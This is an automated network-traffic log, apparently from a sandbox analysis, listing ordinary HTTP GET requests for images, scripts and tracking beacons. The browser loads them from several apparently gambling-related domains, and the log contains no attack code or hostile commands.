Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/guide.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/06.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/01.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/lazyload.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/gui-base.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972860984 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4044.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/headerTip.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/images/partner/partner-hongtu-white.png HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /default.html HTTP/1.1Host: js326.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/login.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/logo.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/menu.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/inside.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/footerNav.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /default.html HTTP/1.1Host: yh8613.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/slides.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/news.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/qrCodeHome.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/367/views/home/indexList.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=9375188508 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=7649153494 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/pb_icon.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/convenient_icon.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/security_icon1.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/uy09/202307/202307200237350.png HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=3717168674 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=6167440772 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8285707295 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/icon_kuaijie.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/367/mask_sport.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=5735666541 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=5294706042 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
